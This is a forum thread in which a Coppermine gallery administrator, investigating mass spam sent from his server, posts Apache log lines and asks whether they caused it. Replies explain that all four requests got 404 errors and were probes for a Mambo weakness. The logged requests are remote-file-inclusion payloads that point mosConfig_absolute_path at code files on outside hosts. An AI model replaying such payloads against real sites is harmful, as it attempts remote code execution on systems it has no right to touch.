Just had a load of direct mail entries from my apache (20,000+) and just looked through all my web logs.. Only thing strange I could find about the same time was this
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
and
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
Is this a problem with coppermine? and could this have caused the mail injection?
System details are as follows
Coppermine = 1.4.25 (stable) (bridged on phpbb3.5)
php = 5.2.11
Mysql = 5.0.86
Server = Centos 5.4
They are all 404 - nothing happened.
Quote from: Nibbler on January 02, 2010, 05:37:16 PM
They are all 404 - nothing happened.
??? Off I go looking elsewhere then, something has let it in.. ThanX for the quick answer
Looks like someone is probing for a Mambo weakness as far as I can see.